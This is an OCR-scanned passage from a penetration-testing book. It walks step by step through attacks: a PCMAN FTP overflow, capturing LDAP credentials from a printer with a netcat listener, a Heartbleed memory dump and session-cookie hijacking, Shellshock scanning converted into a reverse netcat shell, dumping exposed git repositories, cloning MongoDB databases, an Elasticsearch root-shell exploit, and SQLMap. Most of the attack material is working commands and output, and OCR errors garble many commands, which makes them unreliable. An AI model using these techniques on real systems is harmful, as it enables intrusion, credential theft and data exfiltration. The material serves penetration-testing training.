buf += "ig" 


sys,stdout.vrite(but) 





Example Exploit 


Even with MS08-067, the exploit is Operating System and service pack dependent. Luckily with that 
payload, it tries to identify the proper OS before exploiting the host. A lot of the exploits that are 
written in scripting languages do not take these into account and are developed for a single OS type. 
This is why you will often see that the exploit will contain information about the system on which it 
was tested. Even within the same Operating System, something like the Language of the OS can cause 
an exploit to fail or cause a denial of service. For example, the following PCMAN FTP buffer 
overflow exploit was only tested on the French version of Windows 7 SP1. This does not guarantee 
that this exploit will be successful on the English version. 
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PCMAN FTP 2.07 PASS Command - Buffer Overflow 


EDB-ID: 27277 СУЕ: N/A OSVDB-ID: 94624 

Author: Ottomatik Published: 2013-08-02 Verified; W Rating 
Overall: 

Exploit Code: Ё) Vulnerable App: 

Previous Exploit Home Next Exploit 


#!/usr/bin/python2.7 
# -*- coding: utf-8 -*- 


PCMAN FTPD 2.07 PASS Command Buffer Overflow 
Author: Ottomatik 
Date: 2013-07-31 
Software : PCMAN FTPD 


sion () 
Tested On: Windows 7 5Р1 - French; 


* The PASS Command is vulnerable to a buffer overflow; 
* Other commads may be vulnerable; 





FTP Exploit Example Script 


This is why I recommend you understand and test all of your exploits before you try them on any 
production host and make modifications to scripts as necessary. 


Printers 


It often happens that we overlook low-level findings, but there are many times where we can go from 
low to owning the network. One of my favorite examples is with printers. We all come across a ton of 


multi-function printers (MFP) on our engagements and, in the past, have overlooked them. What if 
these MFP devices could lead to a compromise on the network? 

You jump on a network and currently don’t have any credentials. You might want to start small and 
scan only your current subnet in hopes as not to alert any IDS sensors. In doing so, you come across a 
multi-function printer. 


Maybe your scanner picks up default credentials or you guess the password from reading 
documentation. {5} Moreover, perhaps you come across an unpatched printer and use an exploit in 
your printer exploitation folder-check out the /opt/praedasploit 
(https://github.com/MooseDojo/praedasploit) folder. Once in the administrative console, you poke 
around and nothing really of value is there, or is there? You notice that these enterprise multi-function 
printers have the capability to query the domain to find email addresses via LDAP. This means when 
you are physically on the printer using the little LCD screen, when scanning a document, you have to 
internally find the sender's email address based on their name. What if you could pull the password 
from the user account that it used to bind to the LDAP server to run the queries? {6} 


We first log into our Xerox MFP with the default credentials over HTTP. Like I said before, I am 
sure we see this pretty much on every penetration test. 


€ 192.168.10.10 7 À 9$ * 4 5 =#- @ = 


Q Disable Д. Cookies Z CSS- [J Forms- ШШ Images- Ө Information" Miscellaneous: ^ Outline- ^ Resize” JX Tools- ШШ View Sourc 


Centreware 
Internet Services XEROX ColorQube 8900X 





Status 





Description & Alerts 





xerox 


Status: Alert: Paper Tray Empty 
r Name: xerox 
" Location: Copy 
2 Machine Model: Xero olorQube 8900 
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| Alerts 


Default Multifunction Printer 


A quick Google search (or maybe your scanner identifies the default password) and you know that the 
admin password is 1111. Going to the “Properties” tab, we can see that this printer is configured with 
LDAP to query the domain. 
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SMB Filing qf Enabled P3 Edit... 
SMTP (E-mail) PH Enabled A Edit... 
SNMP qf) Enabled A Edit... 
WSD (Web Services on Device) 9 Enabled З =. 


Multifunction Printer - LDAP setting 


Looking at the configuration, we need to modify the LDAP server so that it points to our Kali attack 
VM. This way, any LDAP lookups will be directed to our LDAP server instead of the corporate 
LDAP server. 


We see in the username, that it currently uses a domain account and although the password field is 
blank, we can still make changes without re-entering the password information. We go ahead and 
save our configuration changes. 


entree : AC | LT | нта ты 


ntemet Services XEROX ColorQube 8900Х 


Slavs foba — Print 77 Address Book | Properties | Support 


Coal gurabea {гг 


шнш LDAP Server 


Contexts User Mappings Cusltim Filters. | 


| Server Information 


Ж [Ped Address Friendly Мате 


[Реб Addrems bela 


- Hast Чат 
TF Address: Port 


194 ; 6% 
Backup IP Address : Port 
рг р |p 


LOAD Server 


Мезсара т 


| “Optional Information 


Search Directory Rot 
шавен ns hacker c sbestlah 


Login Credentials Access LDAP Server Login Name 
) нич hacker lestlabkDomai Admin Account 
ww Lagged.in Jer 


P ri 
Ж System crude: 


Бане ралы 


O Sekai to mye nem password 


SSL 
(0 Enable 551 (Secure Socket Laye) 
Vakdate Repogtory 551 Cerblicate (trusted, nat expired, comect FODNI 
їн Trusted So) бебем 
Trusted $51 Certificates 
Ho vahdabon = 
Multifunction Printer - LDAP Modification 





Now, we just need to wait until the MFP creates an LDAP lookup and we should be able to capture 
the credentials. Luckily, in the case of Xerox (and many other printers), they have a feature to test 
your LDAP queries. 


We can click the "User Mappings" tab and test a user lookup. 
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MFP - LDAP Check 


Remember that we are now pointing the LDAP server to our Kali Linux box. Before testing an 


account, we need to set up a netcat listener on the specified server we set in the configuration page 
above. We start a quick listener on port 444 (or whatever port you configured) and go back into the 
management console, and hit the “search user" button. 


root@kali: * 


File Edit View Search Terminal Help 
s nc -l -vv -p 444 
ening on [any] 444 
inverse host lookup failed: Unknown server error : Con 


connect › 
G6C[HHT6 : HShacker.testlabXDomain Admin Account@ $uper$ecretPass!! 
ғ rcv d Bd 





MFP - Capturing LDAP Credentials 


Looking at our netcat output, we now see that the MFP, which is connected to our Kali netcat listener 
via LDAP, tried to authenticate using a Domain Admin Account and a password of 
“Super$ecretPass!”. 


In most cases, you might not come across a domain admin account, but you will have your first 
account to move laterally through the network. 


Heartbleed 


Heartbleed is one of those buzzword security vulnerabilities that blew up in 2014. Unfortunately for 
network administrators and system owners, this vulnerability was one of the worst issues of that year. 
The Heartbleed bug was a vulnerability in OpenSSL that allowed an attacker to read parts of the 
server’s memory. So what does this really mean? You can ask a server that uses SSL security for 
encryption to perform a request and, in addition, give you some allocated chunk of memory back. For 
an easier visual reference, visit this xkcd article: http://xkcd.com/1354/. From the xkcd comic strip, 
you ask for a word to be returned (example: dog), but ask for the size to be returned as 500 bytes 
instead of the normal 3 bytes. The server will return the word “dog” back to you, and in the process, 
you will also receive any other memory that might have been allocated in previous requests. 


We don’t know exactly how many systems were vulnerable, but zmap.io did a scan of the Alexa Top 
1 Million domains as of April 16, 2014 and reported which domains were vulnerable at the time. 
Supposedly, reports have stated that even today some of the domains are vulnerable. See 


https://zmap.io/heartbleed/vulnerable.html. 


The scary part was what was found in the memory space. From numerous penetration tests, we found 
passwords, usernames, random strings, emails, session keys, and even private SSL certificates. With 
private SSL certificates, we can now decrypt any traffic that we sniff. 


So let’s walk through one example. Although there are numerous tools (a Metasploit module is 
available) to pull memory from vulnerable OpenSSL services, we are going to compile our own: 


ө cd /opt/ 

e wget 
https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/heartbleed.c 
e gcc heartbleed.c -o heartbleed -Wl,-Bstatic -1551 -W1,-Bdynamic -15513 -lcrypto 

ө chmod +x heartbleed 


We should have a heartbleed binary to execute against a vulnerable service. The most common way 
to exploit heartbleed was via HTTPS, but it 1s not the only way. One more interesting example that I 
have seen in multiple environments is from OpenLDAP using OpenSSL. We all know that LDAP is 
the authentication and authorization source for many different companies and being able to pull out 
sensitive data could be detrimental. 


From our vulnerability scanner output, we see that 192.168.100.101 is vulnerable to Heartbleed. 
Let’s take the binary we just compiled and execute it against that host: 

e /heartbleed -s [IP] -p [port] -f [output file] -v [verbose] -t [type] 

e example below: ./heartbleed -s 192.168.100.101 -p 636 -f output_Idap -v -t 1 





nal record type=24, lengthz16384 
16384 bytes of heap to file 
turned type=24 Length=16416 


Heartbleed check 


What might we see in the output 1аар file? If you look closely, we see а SSHA {SSHA} hash. We 
could take that into oclHashcat and crack it. In the same dump, we could have also seen user 
accounts, organizational structure, and private SSL certificates as well. We could have made a copy 
of the private SSL certificate and sniffed all the traffic to that LDAP server. This could mean that we 
would have every user's account that authenticated against this LDAP server. 
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Heartbleed - LDAP Memory Disclosure 


Now, we know there are tons of different Web and LDAP servers that were vulnerable, but these 
aren’t the only juicy sources of Heartbleed data. One of the largest issues and attacks seen with 
Heartbleed was that it affected SSL VPNs. Imagine for a second that you could read the server’s 
memory on a VPN server. What would be the impact if you could see username and passwords? In 
theory, you would have direct access as any user that was logged in at that time. What if the 
vulnerability was after-hours? Whose account might you compromise? In the case of Heartbleed, as 
many IT administrators VPN’ed in during the rush to patch systems, they could have been getting 
compromised at the same time. 


Let’s take a look at the Juniper SSL VPNs that were vulnerable to this bug. Running the same 
command as before, we query the SSL VPN web server to return what is stored in the designated 
memory space. A result would look like the following: 





ú | Heartbleed - “SSL NIE а 


In this case, the client even had two-factor authentication, but remember how two-factor works with 
SSL VPNs. Once you authenticate with both username/password and token (second factor), you get 
back a web session ID. If you capture just the web session ID, you can impersonate this user now 


(without the second factor) by taking their session ID and importing it into your own browser. For 
example, we see in the heartbleed memory dump a cookie called DSID. What is the DSID? 


“The SA issues an HTTP cookie to authenticate a user session (DSID), which is shared by client 
components (that is, NC/WSAM/Pulse) and the browser. Generally, browsers do not store cookies in 
any secure manner; so it is relatively easy for an attacker to obtain the DSID cookie and gain access 
to an SA session.” {7} 


This is the user’s session cookie! If we grab this cookie and create this cookie in our browser, we 
become this user. So let’s open up Firefox, access the VPN server, select Cookies from the Web 
Developer tab, and view Cookie Information. 
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Heartbleed - Adding a Cookie 


You might already see two different cookies or the DSID cookie might even be missing. Just add it in 
with the DSID value you obtained from the Heartbleed bug and reload that page. 


v 2 cookies 


Name DSSIGNIN 

Value url default 

Host suck.testlab 

Path /dana-na/ 

Expires Thu, 31 Dec 2037 00:00:00 GMT 
Secure Yes 

HttpOnly No 


Name 
Value 
Host 30a4bffS50aasdfsdfasdfasdf3613334 
Path / 

Expires At end of session 

Secure Yes 


HttpOnly No 


Heartbleed - Adding the DSID Cookie 





From recent assessments, I don’t really see Heartbleed publicly accessible as when it first came out, 
but I still find it often on internal engagements. 


Shellshock 


Shellshock was the second huge vulnerability in 2014 that caused a multitude of systems to get 
infected all over the Internet.{8!} Shellshock was a vulnerability that allowed remote code execution 
due to the fact that Bash has rules for handling the string “() { :; };”. The vulnerability relied on how 
the system would parse environment strings. Although this didn’t solely affect CGI, due to the fact that 
Bash can parse CGI scripts, this vulnerability is easily attackable. The first part of the exploit string, 
which is really just an environment variable function definition followed by a semi-colon, is written 
as "() { :; 5". Regardless of what the function definition contains, all we care about is the value we 
inject after the trailing semicolon, which will be parsed and executed by vulnerable versions of Bash. 


Shellshock Lab 


This sounds complex, but the best way to demonstrate shellshock is through an example. This will 
give you a good understanding of how it works. The OWASPBWA vulnerable web application 
virtual machine is vulnerable to the Bash exploit, so make sure you have it running. Log into that VM 
image and copy the vulnerable cgi file listed below first. 


On the OWASPBWA VM Image from a Terminal: 


ө weet --no-check-certificate 
https://raw.githubusercontent.com/cheetz/icmpshock/master/test.cgi -O  /usr/lib/cgi- 
bin/test.cgi 

e chmod +x /usr/lib/cgi-bin/test.cgi 

e Find the IP of the vulnerable host (ifconfig) 


This will write a shell script to the cgi-bin folder that we need to use to execute the vulnerability. 
Remember for something like Shellshock to work, it needs to have a bash file in the cgi-bin folder. 
You can access it by going to a browser and inputting http://[IP of vulnerable host]/cgi-bin/test.cgi. If 
everything worked, you should see a page that just says “hi”. 


Going back to our attacking Kali host, we are going to use a tool I created called icmpshock.py (note 
that there is also a Metasploit module, so try them all). The reason I created this script is because I 
wanted the tool to brute-force through all common cgi type files at an amazing speed and test all the 
common HTTP header information (User Agent, Cookie, Host, Refer) with ShellShock. As long as 
you have a pretty big pipe, you can take advantage of Python's threading to brute-force through all cgi 
files/directories in just seconds. Remember that we are going for quick and efficient to try to pop as 
many boxes as possible. 


Now, we go back to our attacking VM host, which you have already configured at the beginning of the 
book, and go to: 

e cd /opt/icmpshock/ 

e chmod +x icmpshock.py 

e gedit target list.txt and add the vulnerable server's IP 

e Start Up tcpdump to listen for ICMP in a new terminal window. 

© tcpdump -nni ethO -e icmp[icmptype] == 
e /icmpshock.py [Listener IP of the Kali Host] target list.txt 


This script will brute-force through many different common cgi paths and filenames. If it successfully 
identifies a file and that file is a shell script, it will inject the shell shock exploit to force the system 
to ping back to our victim host. This shows that the victim is not only vulnerable, but that we also 
have command execution. 


This is why we set tcpdump to listen to ICMP requests. In the example below, the icmpshock.py 
script is going through its list of cgi location/files and when it hits cgi-bin/test.cgi, it causes the victim 
host to ping our attacker box. 


Attacking Host — 


File Edit V 
Чы. tcpdump -nni eth -e icmp[icmptype] == 8 
tcpdump: verUUse UULDUL SUDDTESSEU, Use -V OT -WV TOI Full protocol decode 
listening on eth@, link-type ЕМІӨМВ (Ethernet), capture size 65535 bytes 
01:08:48. 354113 00:0с:29:72:0с:8с > 00:0c:29:e3:f6:49, ethertype IPv4 (Gx0806) 
Ith 98: 192.168.222.130 > 192.168.222.129: ICMP acho request, id 5/43, seq 1, 
54 

root@kali: /opt/icmpshock 


File Edit View Search Terminal Help 


Make Sure to Start Your ICMP Listner First | tcpdump -nni eth -e icmp[icmptyp 
Usage | python icmpshock.py «listener IP» «targets file> 


ж. 


Е.Х | python icmpshock.py 127.0.0 I target_list.txt 


А Tem Address: 192.168.222.129 
[*]Thread Count: 100 


i [1 үү! Addresses 


>> m 168, m. I 0 


[*]Рге55 [ENTER] to start sean. 
[+]HTTP CODE 200 = http: //192.168.222.136/cqi-bin/test cal 
[+]HTTP CODE 208 > http://192.168, 272 ЕТТ, 
:/opt/icmpshock#| python icmpshock.py 192.168.222.129 target list.txt 


ICMPShock Exploit 





We now know we have command execution and can go back to our script to change the “Command” 
variable to run whatever shell command we want: 
ө gedit icmpshock.py 


We won’t get into post exploitation in this section, but the easiest thing to do would be to spawn a 
reverse netcat listener up. Let’s uncomment the code with the bin/nc command and comment the 
original ping comment. 


*icmpshock.py (/opt/icmpshock) - gedit 


File Edit View Search Tools Documents Help 
9 & Open v EA Save = 9 Undo © NA E Q PA 
d$ *icmpshock.py 


#If we see ICMP packets coming to our machine from the target, we will 
know that the target is vulnerable. 


def getStatus(ourl): 
global LISTENER 
#The first system argument is our own machine, you can set to "localhost" 
or "127.0.0.1" unless testing another machine for an ICMP response. 
#This should be the address used to locally run tcpdump. 


#The following variables are defined as headers for our POST request. 


sh" # ипсоттепї this 





USER AGENT = "() { :; }; " + Command 
Cookie = "() { :; }; " + Command 
Host = "() { " + Command 


23 1}; 
ICMP Shock - Enabling a Netcat Listener 


After making modifications to the code, we need to open a new terminal window and set up a listener 
(instead of the ICMP tcpdump setting configured in the prior example) on the attacking host: 
e nc -l -p 4444 


Run the icmpshock.py tool again and you should get a connection back. To test, we can run a quick 
“list directory contents" command (1s) and we should see the files in that directory. 


root@kali: ~ 


Hel p 
:=# nc -l -p 4444 
Ls 
test .cgl 
мһоаті 
www-data 


File Edt View Search Terminal Help 


Make Sure to Start Your ICMP Listner First | tcpdump -nni 
al | python icmpshock.py «listener IP» «targets file> 
| python icmpshock. ру 127.0.0.1 target list.txt 




















[* IL $stoning Address: 192. 168. 222.129 
[*]Thread Count: 100 


[*]Press [ENTER] to start scan- 
[*]HTTP CODE 200 > http://192.168.222.130/ 


ICMPShock - Exploit 











We have a full shell on all the vulnerable shellshock systems. We aren't limited to only web-based 
shellshock exploits either, as you can see below: 
e SSH: 





http://resources.infosecinstitute.com/practical-shellshock- 


exploitation-part-2/ 
e DHCP: 
О https://github.com/rapid7/metasploit- 
framework/blob/master/modules/exploits/unix/dhcp/bash_environment. 
e OSX/VMware: 
О https://github.com/rapid7/metasploit- 
framework/blob/master/modules/exploits/osx/local/vmware bash func 
e OpenVPN: 
О http://www.darknet.org.uk/2014/10/openvpn-vulnerable-to- 
shellshock-exploit/ 


Dumping Git Repositories (Kali Linux) 


It is becoming a very common practice for web developers to implement revision control systems for 
their code base. Different examples of these tools are Git, Bazaar, Mercurial and Subversion, but they 
all work relatively the same. A common mistake seen throughout many development environments is 
that developers tend to leave their repositories (repo) publicly accessible. {9} {10} 


As a penetration tester, once a repository is identified via a web scanner, the common techniques is to 
clone the repository, look for sensitive information in different commits, and restore older versions of 
the applications. As seen in our next example, Git repositories are usually found in a .git directory 
(example: 10.10.10.10/.git/). 


& 10.10.10.10/.git/ 





Index of /.git 


e Parent Directory 
e FETCH HEAD 
e HEAD 

e ORIG HEAD 
e branches 

e config 

e description 

* hooks/ 

e index 

e logs/ 

e objects: 

e packed-refs 

e refs/ 





Vulnerable Git Repository 


We can clone the whole remote Git repository onto our Kali Linux host by running a recursive wget 
command from the ./git root (we will assume 10.10.10.10 is the vulnerable server): 


өсі ~ 
e weet -r http://10.10.10.10/.git/ 
e cd 10.10.10.10 


We now have the Git repository cloned onto our local computer and we can run a couple of Git 
commands to pilfer for data. The first command to run is a status command. A status command shows 
you the status of files 1n the index versus the working directory and can be run by: 

e git status 


deleted: images/deselect -arrow.png 
sclaimer-dot.png 


j]s/libs/respond.min.js 
secret .рһр 


no changes added to commit (use "git add" and/or "git commit -a") 
:~/1 10. 10# git status 


Git - Deleted Files 





In the status output, we see that in the local revision, secret.php was deleted. To recover the deleted 
change, we can run a git diff command which will generate patch files or statistics of differences 
between paths or files in your git repository. To view the exact changes run the git diff 
command{11}: 

e git diff 


diff --git a/secret.php b/secret .php 

deleted file mode 100644 

index //eaa2T. .0000000 

--- a/secret .php 

+++ /dev/null 

@@ -1,102 «0,0 @@ 

-<!DOCTYPE html» 

-&! --[1f IE /]» <html class="no-js ie/ oldie” Lang- 
-<!--[if IE 8]> «html class="no-js ie8 oldie" lang-' 
-<!--[if IE 9]> <html class="no-js ie9 oldie" lang-' 
-<!--[if gt IE 9]><!--> <html с1аѕѕ="по-јѕ" 1апд="еп"> 
-<head> 

- «<meta charset="utf-8"> 


- «meta name-"viewport" content="width=device-width"> 


- #Super secret password = "thekeystothekingdom" 


Git - Recovering Passwords 


After running the diff command, we see that the Super secret password was removed. We can also 
recover the whole file by running a command to pull all files from the last commit: 
ө git reset --hard 


These same types of techniques can be used to recover data from different types of repositories, but I 
wanted to point out the wealth of data that can be obtained from bad practices and misconfiguration. 


NoSQLmap 
(www.nosqlmap.net/)(Kali Linux) 


I will discuss NoSQL further below in the web exploitation section, but with the increasing growth of 
NoSQL databases it is important to know how to interact with them. On numerous tests, scanners will 
find open Mongo/Couch databases with no passwords. I might not have time during the test to go 
through all the data in those databases, so this is where tools provide great value. If you want to 
replicate this specific attack, go into the NoSQL Database Injections section and set up the vulnerable 





Mongo database and associated web application. 


Starting NoSQLmap: 


e cd /opt/NoSQLMap 
e python nosqlmap.py 
e ] - Set Options 
o Set options for target host IP (your Mongo IP) 
o Set local MongoDB/Shell IP (your IP) 
o b - Save option file 
ox- to Exit 
e 2-NoSQL DB Access Attacks 


Once the attack starts, you should see the following: 


e DB Access attacks (MongoDB) 


e Checking to see if credentials are needed... 

e Successful access with no credentials! 

e MongoDB web management open at  http://192.168.199.128:28017. 
authentication required! 

e Start tests for REST Interface (y/n)? y 

e REST interface not enabled. 


e |-Get Server Version and Platform 

e 2-Enumerate Databases/Collections/Users 

e 3-Check for GridFS 

e 4-Clone a Database 

e 5- Launch Metasploit Exploit for Mongo < 2.2.4 
e 6-Return to Main Menu 

e Select an attack: 1 


e Server Info: 

e MongoDB Version: 2.0.6 
e Debugs enabled : False 
e Platform: 32 bit 


e Select an attack: 2 
e List of databases: 
e local 


ө admin 
e users 
e appUserData 


e Select an attack: 4 

e Select a database to steal: 5 

e Does this database require credentials (y/n)? n 
e Database cloned. Copy another (y/n)? n 


So, what we effectively did was copy the victim's Mongo database to our local Mongo instance. We 
can now copy all the databases we have and look at them at a later time for sensitive information. 
How do we look at this data? In our example, we stole the database appUserData and cloned it. In 
our local copy of Mongo, we will see a new database populated called appUserDataf stolen. To 


view it: 
e mongo 
e show dbs 
e use appUserData 
e show collections 
e db.users.find() 


> use appuserData 

switched to db appUserData 
> show collections 

system, indexes 

users 

> db.users. findi) 


; ' id" : ObjectId( "54dfda/edfcocSab0dd/0fdll"), "пате 


"Jamesüsuck.testlab" | 


uU" : Objectid( "54#4а800+#с5с9абдаа70ға12"), "name" 


‚ "franküsuck.testlab" } 


| "id" : ÜbjectId( "S4fdaBlafc5c9a60dd/0fd13"), "name" 


"paulgüsuck.testlab" } 


NoSQLMap - Cloning 


"james", "username" 


‚ "frank", username” 


"paul", “username” 





If you spend some time looking at the power of NoSQLMap, you will also see that there are some 
modules for exploitation. Within the tool, it also integrated a Metasploit exploit module for Mongo 


systems below version 2.2.4. 


Elastic Search (Kali Linux) 


I will say this throughout the book: One of the most important things in becoming a penetration tester 
is understanding a wide breadth of different technologies. Building a lab in your own environment 
with all the different types of servers will help identify what you might run into in the real world. I 
was on an engagement where the vulnerability scanners didn’t find any vulnerabilities for an Elastic 
Search (ES) database. By default, ES has a web application running on port 9200 used for its search 
API. It might have looked something like this: 


{_}http://127.0....ch?q=* &pretty 2€ H 2 New Tab % | op | 





<a istic.hacker.testlab arci . tt 


Most Visitedv fllloffensive Security Ҹ Kali Linux Ҹ Kali Docs ERExploit-DB 


"took" : 83, 

"timed out" : false, 

" shards" : ( 
"totel" ; 1, 
"successful" : 1, 
"failed" : 0 


" index" : ".marvel-2015.03.09" 

" type" : "node stats" 

cad" АШУ -Ga03AJx1gisvbPOA" , 

" score" 1. 

" source" : b 
"Qtimestamp" : "2015-03-09T19:01:15.9752", 
"cluster name" : "elasticsearch", 


Elastic Search - Vulnerable search service 


After finding something like this, I instantly knew that 9200 was a port defaulted to Elastic Search, 
and o dus. I monitor security RSS feeds, I remembered that there was a recent vulnerability for it 
; : -cve-2015-1427/). 

Searching through exploit code, I was able to find one on  Xiphos Research 
(https: //github.com/XiphosResearch/exploits/tree/master/ElasticSearch). I ran a quick wget on my 


Kali host, connected via the exploit and had a root shell. 





| root@kali: /opt 


File Edit View Search Terminal Help 


ticSearch , CVE-2015-1427 Version: 20150309. 
Shell on target... its only semi-interactive... U 


)( root) 


pool /пе 


/spoo 





var/www:/bin/sh 


Elastic Search - Exploit 


Elastic Search Lab: 


If you want to build and test your own vulnerable Elastic Search service, you can install it with the 
following: 

e update-java-alternatives --jre -s java-1.7.0-openjdk-1386 

e weet https://download.elasticsearch.org/elasticsearch/elasticsearch/elasticsearch- 

1.4.1.zip 

ө unzip elasticsearch-1.4.1.zip 

e cd elasticsearch-1.4.1/bin/ 

e /plugin -i elasticsearch/marvel/latest 

e /elasticsearch 


Once elasticsearch is running, you can download and execute your exploit code: 
e wget 
https://raw.githubusercontent.com/ XiphosResearch/exploits/master/ElasticSearch/elas 
e chmod +x ./elastic_shell.py 
e python ./elastic_shell.py localhost 


And with that, you have compromised another database and obtained access onto a ton of different 
hosts. 


Summary 


This is a baseline overview on taking the findings from the scanner results and putting them into 
action. These examples will help lead into how to exploit systems in the upcoming chapters. Attacks 
and exploits might not always work, which is why I stress that my readers avoid being tool- 
dependent. It is more important to understand why an attack works and what the underlying issue 1s, 
so that if a tool fails, you have the ability to modify and fix that exploit. 


What helped me learn how to exploit computers was to take exploits from sites like 
http://www.exploit-db.com/remote/ and recreate them in another high-level scripting language of my 
choice. Developing these types of scripts and testing them against your own servers will help you 
gain a much stronger background in coding and a better understanding for why vulnerabilities work. If 
you are looking to dive deeper into exploit development, I recommend reading The Shellcoder's 
Handbook: 


http://amzn.to/19Z1gfE. 


The Throw - Manual Web Application Findings 


At this point, you have assessed SUCK’s network, compromised the network scanner vulnerabilities, 
and now you need to move on to web attacks. As more and more companies start to run vulnerability 
scans of their own, I have slowly (slowly) been seeing a trend of the low-hanging service-based 
vulnerabilities going away (like MS08-067). Therefore, the shift to application-based vulnerabilities 
are still an easy target to exploit since most vulnerability scanners either do not provide web 
application testing or do not enable web application scanning because it may break applications or 
take way too long to scan. 


As this book is geared more toward Red Teaming concepts, this book does not go in depth on all the 
different vulnerabilities and how to manually exploit them. This 18 because a manual web application 
book needs to be very detailed and discuss all the more obscure attacks like CORS (Cross-Origin 
Resource Sharing), SSRF (Server-Side Request Forgery), the various one-off OAuth issues that come 
with misconfiguration of security controls, and others. If you are looking for more information on 
testing all sorts of web type vulnerabilities, you should heavily use these three resources: 
e OWASP Testing Guide 
о http://bit.ly/19GkG5R 
o https://www.owasp.org/images/1/19/OTGv4.pdf 
e SANS - Securing Web Application Technologies 
о https://www.sans.org/security-resources/posters/securing-web- 
application-technologies-swat-2014-60/download 
e The Web Application Hacker's Handbook: Finding and Exploiting Security Flaws 


© http://amzn.to/11xZaCv 


Lastly, if you read about Printer Exploitation in The Drive section, that is a great example of how a 
web configuration vulnerability can get you to DA (or at least a domain account). 


Web Application Penetration Testing 


In the initial prep section, we have set up a couple of vulnerable VMs for testing. Since some of this 
section will be based off the OWASP Broken Web Application VM, I highly recommend you set it up 
prior to reading this chapter. You can download the VM here: 


e http://sourceforge.net/projects/owaspbwa/files/ 


Once you download it, you can unzip it and run it in either VMWare or VM Player. Once loaded, grab 
the IP of the virtual machine and open it up in your local browser. It should look something like the 
following: 
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This is one of my favorite web application testing platforms. Definitely spend time learning how to 
break different web applications. 


SLQ Injections 


From either the scanning results or from just poking around, you might be able to identify some SQL 
injections (SQLi) vulnerabilities. This is great because SQLi vulnerabilities can lead to a full 
compromise of the database or of the system itself. Two open source tools that I have found to work 
most of the time are SQLmap and Sqlninja. Let's go through the process from identification to 
exploitation. 


SOLMap with Burp 


SOLmap is one of my favorite tools to use for finding SQL injections, manipulating database queries, 
and dumping databases. It also has additional functionality to get an interactive shell through an 
injection and can even spawn Meterpreter or a VNC session back to the attacker. 


Before I show you how to use the command line versions of these tools, we will see how integration 
with Burp Proxy Pro also works extremely well. This has saved me from memorizing all of the 
different commands and allowed me to focus on being more efficient and effective. 


Install: 
e Jython 2.7beta3 
e http://www .]ython.org/downloads.html 
e Download Jython 2.7beta3 - Standalone Jar : For embedding Jython in Java 
applications 


Extender -> Options -> Python Environment -> Add the location and file of where you download 
Jython: 

e Start Burp with: java -XX:MaxPermSize-1G -jar burpsuite_pro_v1.6.10.jar 

e Extender -> Options -> Python Environment -> Add the location and file of where 

you download Jython 

e Restart Burp 

e Extender -> BApp Store 

e Select SQLiPy 

e (might as well install HTMLS Auditor, Ј2ЕЕЅсап, CO2) 

e Restart Burp 





Burp Intruder Repeater Window Help 


Target | Proxy | Spider | Scanner | Intruder | Repeater | Sequencer T Decoder | Comparer | Extender | Options Į Alerts | 


Extensions | BApp Store | Apts | Options | 


BApp Store 





The BApp Store contains Burp extensions that have been written by users of Burp Suite, to extend Burp's capabilities. 





























Name installed Rating Detail 

trror message t necks U TOO vro extension a SQLIPy 

Faraday о kkk 

Google Hack OQ Los s oi This extension integrates Burp Suite with SQLMap. 

GWT Insertion Points О Ls 227071 Pro extension 

Headers Analyzer o yox Pro extension Requirements 

HeartBleed о ЖЖЖЖ 

HTMLS Auditor array Pro extension € Jython 2.7 beta, due to the use of json 

Identity Crisis О tririine Pro extension € Java 1.7 or 1.8 (the beta version of Jython 2.7 requ 
Image Metadata B kkk 

Issue Poster Ө titit Pro extension € A running instance of the SQLMap API server 
Ј2ЕЕЅсап О ЖЖЖ Pro extension 

JS Beautifier ceo xn d SQLMap comes with a RESTful based server that will ex« 
JSON Decoder [a tok: manually start the server with 

Lair ы kkk Pro extension python sqlmapapi.py -s -H <ip> -p <port> 
Logger++ Q ooo 

NMAP Parser о ketone Alternatively, you can use the SQLMap API tab to select 
Notes O Жж}: well as the path to python and sqimapapi.py on your sy 
Payload ZEN _ зіі: Once the 501. Мар АРІ is running, you just need to right 
Protobuf Decoder — kkk of either the Target or Proxy main tabs and choose 'SQ 
Python Scripter E wkkkk menu. This will populate the SQLMap Scanner tab with i 
Random IP Address Header ы жж Clicking the "Start Scan” button will execute а scan. If th 
Reflected Parameters ы KKK Pro extension injection, then these will be added to the Scanner Resul 
Reissue Request Scripter оО kiiit 

Request Randomizer rd For more information, see the post here: Брэ | wow 
Retire.js B Keke Pro extension 

SAML Editor о ЖЖЖ Author: josh Berry @ CodeWatch 

SAML Encoder / Decoder о dote Version: 0.3.8 

Sentinel e Aiki 

Session Auth Q оаа е Pro extension Rating: ооо е‘ 


Session Timeout Test 
Site Map Fetcher 







| Install 


Burp - SQLiPy 


To use Burp and SQLMap, you start an SQLMap API on your Kali box; meanwhile, Burp Proxy Pro 
can be running anywhere. When Burp finds an SQL injection, it will connect to SQLMap’s running 
API to automatically attack the vulnerable parameters. Let’s now start the SQLMap API listener. 


Start SQLMap API: 
ө cd /opt/sqlmap 
e python sqlmapapi.py -s [IP] -p [PORT] 


qlmappython sqlmapapi.py 


:5 -Н 172.16.151108 -p 





Burp and SQLMap LAB: 


SQLMap API 


To demonstrate how to use Burp and SQLMap, we can run a quick demo with the OWBWA VM we 
configured at the beginning. Once loaded, visit [ip]/webgoat.net/Content/SQLInjection.aspx and 
proxy through the Burp tool like we had done with our prior Burp example. 


Ф Meet the FoxyProxy... * 


€ 172.16.151.144 


Ө webGoat.NET 


x \Ф 


B Most VisitedY Bb offensive Security “©. Kali Linux “A Kali Docs ERExploit-DB M Aircrack-ng 


P WEBGOAT.NET 





Getting Started with 
WebGoat.NET 


WebGoat Coins Customer 
Portal 


Injection Attacks 
SQL Error Messages 
Exploiting SQL Injection 


File Download Path 
Manipulation 


File Upload Path 
Manipulation 


Cross Site Scripting (XSS) 
Authentication Issues 


Testing and Debugging 


a 


Injection Attacks Exploiting SQL Injection 


EMPLOYEE EMAIL 


Are you looking to contact one of our employees? L 


Enter the first few letters of their first or last name 


Name d 





Find Employee 


firstNamelastName email 

Leslie Thompsonithompson@webgoatcoins.com 
Foon Yue Tseng fiseng@webgoatcoins.com 
Tom King tking@webgoatcoins,com 


WebGoat Vulnerable Application 


Make a couple quick searches while proxy’ed through Burp Proxy Pro. In the HTTP history tab, you 
should see the POST request created by the application. Right-click on any request that we want to 


test and run SQLiPy Scan. 


Spider | Scanner r 3 Sequencer Decoder Comparer Extender | Options 
Í intercept | history | WebSockets history | Options 








Filter: Hiding CSS. image and general binary content 


Host | Method | URL | Params Edited Status Length | MIME type | Ех 











[Rawi] Params | Headers | Hex | viewstate | Send to Spider 


